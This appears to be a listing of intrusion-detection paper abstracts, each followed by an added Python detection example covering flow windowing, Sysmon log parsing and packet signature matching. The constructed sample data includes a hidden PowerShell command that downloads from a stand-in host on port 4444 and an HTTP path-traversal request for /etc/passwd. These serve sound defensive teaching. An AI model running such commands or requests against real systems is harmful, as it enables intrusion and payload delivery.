An iterative ellipsoid-based anomaly detection technique for intrusion detection systems

Author(s):  
Shan Suthaharan
2021 ◽  
Vol 11 (4) ◽  
pp. 1674
Author(s):  
Nuno Oliveira ◽  
Isabel Praça ◽  
Eva Maia ◽  
Orlando Sousa

With the latest advances in information and communication technologies, greater amounts of sensitive user and corporate information are shared continuously across the network, making it susceptible to attacks that can compromise data confidentiality, integrity, and availability. Intrusion Detection Systems (IDS) are important security mechanisms that can perform timely detection of malicious events through the inspection of network traffic or host-based logs. Many machine learning techniques have proven successful at anomaly detection over the years, but only a few have considered the sequential nature of the data. This work proposes a sequential approach and evaluates the performance of a Random Forest (RF), a Multi-Layer Perceptron (MLP), and a Long Short-Term Memory (LSTM) network on the CIDDS-001 dataset. The resulting performance measures are compared with those obtained from a more traditional approach, which only considers individual flow information, in order to determine which methodology best suits the scenario. The experimental outcomes suggest that anomaly detection is better addressed from a sequential perspective. The LSTM is a highly reliable model for acquiring sequential patterns in network traffic data, achieving an accuracy of 99.94% and an F1-score of 91.66%.
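The two representations the abstract compares, as an added example that is not the paper's code: CIDDS-001-style flow records (field names taken from the dataset's CSV header, the records themselves constructed here) turned into per-flow feature vectors and into sliding windows of consecutive flows, a hand-written port-scan rule that only the windowed view can express, and the accuracy/F1 computation used to report such results. The hosts, ports and the window size of 3 are assumptions for illustration.

```python
"""Added example, not code from the paper: per-flow vectors (the traditional
representation) versus sliding windows of consecutive flows (the sequential
representation), built from CIDDS-001-style flow records.
The records below are constructed for illustration, not taken from the dataset."""
from collections import namedtuple

Flow = namedtuple(
    "Flow", "ts duration proto src_ip src_port dst_ip dst_port packets bytes flags label")

# Constructed sample: normal traffic, three failed legitimate connections
# (a single SYN with no reply) and a four-port SYN scan from 192.168.100.31.
SAMPLE_FLOWS = [
    Flow("2017-03-17 12:00:00.000", 0.350, "TCP", "192.168.100.5", 51234, "192.168.220.15", 80, 12, 2480, ".AP.SF", "normal"),
    Flow("2017-03-17 12:00:01.100", 3.001, "TCP", "192.168.100.12", 44120, "192.168.220.44", 22, 1, 60, "....S.", "normal"),
    Flow("2017-03-17 12:00:01.400", 0.004, "UDP", "192.168.100.7", 53412, "192.168.220.9", 53, 2, 190, "......", "normal"),
    Flow("2017-03-17 12:00:02.300", 3.000, "TCP", "192.168.100.9", 40211, "192.168.220.44", 22, 1, 60, "....S.", "normal"),
    Flow("2017-03-17 12:00:05.000", 0.000, "TCP", "192.168.100.31", 41000, "192.168.220.15", 21, 1, 60, "....S.", "attacker"),
    Flow("2017-03-17 12:00:05.010", 0.000, "TCP", "192.168.100.31", 41001, "192.168.220.15", 22, 1, 60, "....S.", "attacker"),
    Flow("2017-03-17 12:00:05.020", 0.000, "TCP", "192.168.100.31", 41002, "192.168.220.15", 23, 1, 60, "....S.", "attacker"),
    Flow("2017-03-17 12:00:05.030", 0.000, "TCP", "192.168.100.31", 41003, "192.168.220.15", 25, 1, 60, "....S.", "attacker"),
    Flow("2017-03-17 12:00:06.500", 3.002, "TCP", "192.168.100.20", 50100, "192.168.220.44", 3389, 1, 60, "....S.", "normal"),
    Flow("2017-03-17 12:00:07.000", 1.250, "TCP", "192.168.100.7", 51300, "192.168.220.15", 443, 30, 18800, ".AP.SF", "normal"),
]

PROTO_CODES = {"TCP": 0, "UDP": 1, "ICMP": 2}


def flow_features(f):
    """Traditional representation: one numeric vector per flow.
    The six TCP flag positions (UAPRSF) become six binary features."""
    flag_bits = [0 if c == "." else 1 for c in f.flags]
    return [f.duration, PROTO_CODES.get(f.proto, 3), f.src_port, f.dst_port,
            f.packets, f.bytes, f.bytes / max(f.packets, 1), *flag_bits]


def make_sequences(flows, window):
    """Sequential representation: every window of `window` consecutive flows,
    ordered by start time, labelled with its most recent flow's label (the
    earlier flows are that flow's context)."""
    ordered = sorted(flows, key=lambda f: f.ts)
    return [(ordered[end - window + 1:end + 1], ordered[end].label)
            for end in range(window - 1, len(ordered))]


def syn_only(f):
    return f.proto == "TCP" and f.flags == "....S."


def per_flow_rule(f):
    """What a single record can show: a SYN with no reply. A failed
    legitimate connection looks exactly the same."""
    return syn_only(f) and f.packets <= 2


def sequence_rule(window, min_ports=3):
    """What only a window can show: one source sending SYN-only flows to
    several distinct destination ports, i.e. a port scan."""
    ports_by_src = {}
    for f in window:
        if syn_only(f):
            ports_by_src.setdefault(f.src_ip, set()).add(f.dst_port)
    return any(len(p) >= min_ports for p in ports_by_src.values())


def metrics(tp, fp, fn, tn):
    """Accuracy and F1 from a confusion matrix. With a benign majority,
    accuracy is dominated by true negatives; F1 ignores them."""
    total = tp + fp + fn + tn
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
    return {"tp": tp, "fp": fp, "fn": fn, "tn": tn, "accuracy": (tp + tn) / total,
            "precision": precision, "recall": recall, "f1": f1}


def evaluate(flows, window, rule):
    """Score `rule` (a predicate over a window of flows) against the label of
    each window's most recent flow; window=1 evaluates a per-flow rule."""
    tp = fp = fn = tn = 0
    for seq, label in make_sequences(flows, window):
        pred, truth = rule(seq), label == "attacker"
        if pred and truth:
            tp += 1
        elif pred:
            fp += 1
        elif truth:
            fn += 1
        else:
            tn += 1
    return metrics(tp, fp, fn, tn)


if __name__ == "__main__":
    print("per-flow :", evaluate(SAMPLE_FLOWS, 1, lambda w: per_flow_rule(w[0])))
    print("windowed :", evaluate(SAMPLE_FLOWS, 3, sequence_rule))
```

On this constructed sample the windowed rule misses the first probes of the scan (the window has not filled with probes yet) and the per-flow rule cannot tell a probe from a failed legitimate connection; the paper's LSTM learns such context from data rather than having it hard-coded, which is why the toy rules are not a substitute for its results. The metrics helper makes the reporting point concrete: with a benign majority, accuracy stays near 100% even when the attack class is detected poorly, so the F1-score is the number to read next to the 99.94% accuracy.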


Author(s):  
Mohammad Rasool Fatemi ◽  
Ali A. Ghorbani

System logs are one of the most important sources of information for anomaly and intrusion detection systems. In a general log-based anomaly detection system, network, device, and host logs are all collected and used together for analysis and the detection of anomalies. However, the ever-increasing volume of logs remains one of the main challenges that anomaly detection tools face. Based on Sysmon, this chapter proposes a host-based log analysis system that detects anomalies without using network logs, both to reduce the volume and to show the importance of host-based logs. The authors implement a Sysmon parser to parse the logs and extract features from them, and apply detection methods to the extracted data. The valuable information is retained after two extensive volume-reduction steps. The proposed anomaly detection system is evaluated on five different datasets of up to 55,000 events, and it detects the attacks using the preserved logs. The analysis results demonstrate the significance of host-based logs in auditing, security monitoring, and intrusion detection systems.
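A miniature version of the pipeline the abstract describes (parse Sysmon, extract features, reduce volume, detect), as an added example that is not the chapter's code. The parser reads the Windows event XML layout Sysmon writes (namespace, System/EventID, EventData/Data Name="..."); the ten events, the hostname WS01, the file paths and the documentation-range IP addresses are constructed here, and the rarity threshold of 15% is an assumption.

```python
"""Added example, not the chapter's code: Sysmon parse -> feature extraction
-> two volume-reduction steps -> rarity-based anomaly detection.
All events, hosts, paths and addresses below are constructed for illustration."""
import xml.etree.ElementTree as ET
from collections import Counter

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVT_NS}


def make_event(event_id, computer, **fields):
    """Render a constructed event in the on-disk Sysmon XML layout so that
    parse_event() is exercised on the format it would see in practice."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{EVT_NS}"><System>'
            f'<Provider Name="Microsoft-Windows-Sysmon"/><EventID>{event_id}</EventID>'
            f'<Computer>{computer}</Computer></System>'
            f'<EventData>{data}</EventData></Event>')


def parse_event(xml_text):
    """Flatten one Sysmon event into a dict: event_id, computer, and every
    EventData/Data field keyed by its Name attribute."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    ev = {"event_id": int(system.findtext("e:EventID", namespaces=NS)),
          "computer": system.findtext("e:Computer", namespaces=NS)}
    for d in root.findall("e:EventData/e:Data", NS):
        ev[d.get("Name")] = d.text or ""
    return ev


def basename(win_path):
    """Last component of a Windows path, lower-cased (os.path is POSIX here)."""
    return win_path.rsplit("\\", 1)[-1].lower()


def extract_features(ev):
    """First reduction: keep only ProcessCreate (1) and NetworkConnect (3) and
    only the fields that carry detection value. Returns a hashable key."""
    if ev["event_id"] == 1:
        return ("process", ev["computer"], basename(ev.get("Image", "")),
                basename(ev.get("ParentImage", "")))
    if ev["event_id"] == 3:
        return ("network", ev["computer"], basename(ev.get("Image", "")),
                f'{ev.get("DestinationIp", "")}:{ev.get("DestinationPort", "")}')
    return None


def run_pipeline(xml_events, max_share=0.15):
    """Parse, extract, collapse repeats (second reduction) and flag keys that
    make up at most `max_share` of the kept events: rare parent/child pairs
    and rare outbound destinations on this host."""
    parsed = [parse_event(x) for x in xml_events]
    features = [f for f in (extract_features(e) for e in parsed) if f is not None]
    counts = Counter(features)
    total = sum(counts.values())
    anomalies = sorted(k for k, c in counts.items() if c / total <= max_share)
    return {"raw": len(parsed), "kept": len(features), "unique": len(counts),
            "anomalies": anomalies}


# Constructed sample: routine service and browser activity, one process
# termination (dropped by the first reduction), and an Office document that
# spawns PowerShell which then connects out to an unusual port.
SAMPLE_EVENTS = [
    make_event(1, "WS01", Image=r"C:\Windows\System32\svchost.exe",
               ParentImage=r"C:\Windows\System32\services.exe", User="NT AUTHORITY\\SYSTEM"),
    make_event(1, "WS01", Image=r"C:\Windows\System32\svchost.exe",
               ParentImage=r"C:\Windows\System32\services.exe", User="NT AUTHORITY\\SYSTEM"),
    make_event(1, "WS01", Image=r"C:\Windows\System32\svchost.exe",
               ParentImage=r"C:\Windows\System32\services.exe", User="NT AUTHORITY\\SYSTEM"),
    make_event(1, "WS01", Image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
               ParentImage=r"C:\Windows\explorer.exe", User="WS01\\alice"),
    make_event(1, "WS01", Image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
               ParentImage=r"C:\Windows\explorer.exe", User="WS01\\alice"),
    make_event(3, "WS01", Image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
               DestinationIp="203.0.113.10", DestinationPort="443"),
    make_event(3, "WS01", Image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
               DestinationIp="203.0.113.10", DestinationPort="443"),
    make_event(5, "WS01", Image=r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    make_event(1, "WS01", Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               ParentImage=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
               User="WS01\\alice", CommandLine="powershell.exe -nop -w hidden -c Invoke-WebRequest http://198.51.100.23:4444/a"),
    make_event(3, "WS01", Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               DestinationIp="198.51.100.23", DestinationPort="4444"),
]

if __name__ == "__main__":
    print(run_pipeline(SAMPLE_EVENTS))
```

Ten raw events shrink to nine kept and five distinct keys, and the two flagged keys are the WINWORD.EXE-to-powershell.exe parent/child pair and PowerShell's connection to port 4444; the svchost and Chrome activity is common enough on the host to fall above the threshold. In practice the counts would be built over a baseline period per host rather than over the batch being scored, otherwise a new but legitimate program is flagged the first day it appears.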


2018 ◽  
Vol 67 (1) ◽  
pp. 01-08
Author(s):  
Sienna Arscott

An Intrusion Detection System (IDS) is a hardware device or software application that monitors network and/or system or host activities for malicious activity or policy violations, and produces and sends reports to a Management Station or System Administrator, who decides whether to act on the intrusion or whether it was just a false alarm. There are two kinds of Intrusion Detection Systems: host based and network based. A Network Intrusion Detection System (NIDS) detects intrusions by examining network traffic and monitors multiple hosts connected to the network. It captures all network traffic and analyses the content of individual packets for malicious traffic.
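The packet-inspection half of a NIDS in miniature, as an added example that is not the article's code: parse_ipv4_tcp() pulls the 5-tuple and payload out of a raw IPv4/TCP packet, inspect() matches the payload against content signatures, and each match becomes an alert of the kind a sensor forwards to the management station. The packets, the documentation-range addresses and the two HTTP signatures are constructed here; build_packet() writes zero checksums, so these frames are for the parser only and would not be accepted on a real link.

```python
"""Added example, not from the article: content inspection of individual
packets as a NIDS sensor performs it. Packets, addresses and signatures are
constructed for illustration (zero checksums)."""
import struct
import ipaddress

# Constructed signatures: byte patterns an HTTP rule set might look for.
SIGNATURES = [
    ("http-path-traversal", b"../../"),
    ("http-passwd-read", b"/etc/passwd"),
]


def build_packet(src, sport, dst, dport, payload):
    """Constructed IPv4/TCP packet (PSH+ACK, no options, zero checksums)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return ip + tcp


def parse_ipv4_tcp(frame):
    """Return the 5-tuple and payload of an IPv4/TCP packet, honouring the IP
    header length and TCP data offset; None for anything else."""
    if len(frame) < 20 or frame[0] >> 4 != 4:
        return None
    ihl = (frame[0] & 0x0F) * 4
    total_len = struct.unpack("!H", frame[2:4])[0]
    if frame[9] != 6 or len(frame) < ihl + 20:          # protocol 6 = TCP
        return None
    src = str(ipaddress.IPv4Address(frame[12:16]))
    dst = str(ipaddress.IPv4Address(frame[16:20]))
    sport, dport = struct.unpack("!HH", frame[ihl:ihl + 4])
    data_off = (frame[ihl + 12] >> 4) * 4
    payload = frame[ihl + data_off:total_len]
    return {"src": src, "sport": sport, "dst": dst, "dport": dport, "payload": payload}


def inspect(frames, signatures=SIGNATURES):
    """One alert per (packet, matching signature); non-TCP frames are skipped."""
    alerts = []
    for frame in frames:
        pkt = parse_ipv4_tcp(frame)
        if pkt is None:
            continue
        for name, pattern in signatures:
            if pattern in pkt["payload"]:
                alerts.append({"signature": name, "src": pkt["src"], "sport": pkt["sport"],
                               "dst": pkt["dst"], "dport": pkt["dport"]})
    return alerts


# Constructed capture: a normal request, a traversal attempt, and the reply.
SAMPLE_FRAMES = [
    build_packet("203.0.113.7", 49152, "198.51.100.10", 80,
                 b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    build_packet("203.0.113.7", 49153, "198.51.100.10", 80,
                 b"GET /cgi-bin/../../../../etc/passwd HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    build_packet("198.51.100.10", 80, "203.0.113.7", 49153,
                 b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
]

if __name__ == "__main__":
    for alert in inspect(SAMPLE_FRAMES):
        print(alert)
```

The second frame raises two alerts, one per signature, and the administrator is left to decide whether they are one intrusion or a false alarm. Because this sensor looks at each packet on its own, a pattern that an attacker splits across two TCP segments is not seen; a production NIDS reassembles streams before matching for exactly that reason.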



